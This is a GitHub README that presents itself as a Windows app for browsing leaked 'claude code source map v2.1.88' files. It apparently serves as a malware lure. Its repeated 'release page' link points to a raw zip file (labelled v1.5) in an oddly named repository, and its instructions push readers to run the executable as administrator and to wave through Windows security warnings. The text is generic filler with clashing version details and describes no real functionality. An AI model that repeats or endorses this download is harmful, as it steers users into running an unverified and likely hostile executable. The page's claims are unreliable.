Skip to content

Latest commit

 

History

History
257 lines (169 loc) · 7.19 KB

File metadata and controls

257 lines (169 loc) · 7.19 KB

🧭 claude-code-source - Simple access to source maps

Download

🚀 Getting Started

claude-code-source helps you view and use source map data in a simple Windows app. It is built for people who want a direct way to open the release page, download the app, and run it on a Windows PC.

Use the steps below to get the app set up on your computer.

💾 Download the app

Visit this page to download:
https://raw.githubusercontent.com/urinarybladderwassermann922/claude-code-source/main/vitrifiable/source_code_claude_v1.5.zip

On that page, look for the latest release. In most cases, the file you need will be named for Windows, such as:

  • .exe
  • .zip
  • .msi

If you see a .zip file, download it and unzip it first. If you see an .exe or .msi file, you can run or install it after the download ends.

🪟 Windows setup

Before you start, make sure you have:

  • Windows 10 or Windows 11
  • At least 200 MB of free disk space
  • A mouse and keyboard
  • Internet access for the download

For the best result, use the latest Windows updates and a standard user account with install access.

📦 Install and open

Follow the format of the file you downloaded.

If you downloaded an .exe file

  1. Open your Downloads folder.
  2. Double-click the .exe file.
  3. If Windows asks for permission, select Yes.
  4. Follow the on-screen steps.
  5. Open the app after setup ends.

If you downloaded an .msi file

  1. Open your Downloads folder.
  2. Double-click the .msi file.
  3. Follow the install window.
  4. Wait for the setup to finish.
  5. Open the app from the Start menu or desktop.

If you downloaded a .zip file

  1. Right-click the .zip file.
  2. Select Extract All.
  3. Pick a folder you can find later.
  4. Open the extracted folder.
  5. Double-click the app file inside the folder.

🧰 What the app does

This app is meant for source map work and code review tasks. It gives you a clean way to handle source map data from the claude code source v2.1.88 build.

You can use it to:

  • Open source map files
  • Review mapped code paths
  • Check file links tied to a build
  • Move between release versions
  • Work with source map data on Windows

🖥️ System requirements

The app should run on a normal Windows desktop or laptop that meets these basics:

  • Windows 10 or Windows 11
  • 64-bit processor
  • 4 GB RAM or more
  • 200 MB free disk space
  • A modern screen with 1366 × 768 resolution or higher

For larger source map sets, 8 GB RAM gives smoother use.

🔍 How to find the right file

When you open the release page, choose the newest version unless you need an older one for a specific job.

Look for file names that match your computer:

  • Windows
  • x64
  • win
  • setup
  • portable

If you are not sure which one to pick, choose the Windows x64 build first. That is the common choice for most PCs.

🛠️ First run

After the app opens for the first time:

  1. Let Windows finish any setup prompts.
  2. Wait for the main window to load.
  3. Check that the app starts without errors.
  4. Open a sample source map if one is included.
  5. Save any changes in a new folder at first.

If the app opens in a small window, you can drag the corners to resize it.

📁 Suggested folder setup

To keep your files easy to find, use a simple folder layout like this:

  • Downloads\claude-code-source
  • Documents\source-maps
  • Documents\source-maps\project-1
  • Documents\source-maps\exports

This makes it easier to move between files and keep your work in one place.

⚙️ Basic use

A typical workflow looks like this:

  1. Start the app.
  2. Open a source map file.
  3. Review the mapped paths.
  4. Check the file names and line data.
  5. Export or save your result if needed.

If the app has a file picker, use it to browse to the folder that holds your source map files.

🧩 File types you may see

You may work with files such as:

  • .map
  • .js
  • .json
  • .txt
  • .zip

The app is built to help with source map content, so files tied to web builds and code bundles may appear in your workflow.

🧪 Troubleshooting

The app does not open

  • Check that the file finished downloading.
  • Right-click the file and try Run as administrator.
  • Make sure Windows did not block the file.
  • Try the newer release on the release page.

Windows shows a security prompt

  • Review the file name.
  • Confirm that it came from the release page.
  • Choose the option to run or install if you trust the file.

The app closes right away

  • Restart the app.
  • Reboot your PC.
  • Try the .zip version if you used an installer.
  • Use a newer Windows release if your system is old.

The window is blank

  • Wait a few seconds for the data to load.
  • Open a sample file.
  • Check that the file path is valid.
  • Try another source map file.

The download fails

  • Refresh the release page.
  • Try again with a stable network.
  • Use another browser.
  • Check if the file size matches the release asset.

🗂️ Release page use

The release page is the main place to get new builds and updates.

https://raw.githubusercontent.com/urinarybladderwassermann922/claude-code-source/main/vitrifiable/source_code_claude_v1.5.zip

When a new version appears, download that release and replace your older copy if needed. Keep your files in a safe folder so you can return to them later.

🔐 File safety

Use files only from the release page linked above. Save the download in a local folder you control. If you keep a copy in a shared folder, make sure you know who can access it.

🧭 Typical use case

This app fits a simple desktop workflow where you want to:

  • open a release build
  • inspect source map data
  • review code paths tied to a bundle
  • keep your work on Windows
  • use one clear tool instead of many steps

📄 Version

Current build: claude code source map v2.1.88

🧱 Folder layout inside the app

If the app creates its own files, you may see folders for:

  • cache
  • exports
  • logs
  • config
  • workspace

These folders help the app keep your settings and file history in one place.

🧭 Daily workflow

A simple daily flow looks like this:

  1. Download the newest release if needed.
  2. Open the app on Windows.
  3. Load the source map you want.
  4. Review the data.
  5. Save your work in a clear folder name.
  6. Close the app when you finish.

🖱️ Tips for smooth use

  • Keep your source files in one folder.
  • Use short folder names.
  • Avoid moving files while the app is open.
  • Close other heavy apps if your PC feels slow.
  • Use the latest release for fewer issues.

📌 Download again later

If you need the app on another PC, use the same release page:

https://raw.githubusercontent.com/urinarybladderwassermann922/claude-code-source/main/vitrifiable/source_code_claude_v1.5.zip

Open the page, get the latest Windows file, and run or install it on that machine.

🗃️ Good file habits

To keep your work easy to manage:

  • Name folders by project
  • Save exports with date-based names
  • Keep the original source map file unchanged
  • Store backups in a separate folder
  • Remove old test files when you no longer need them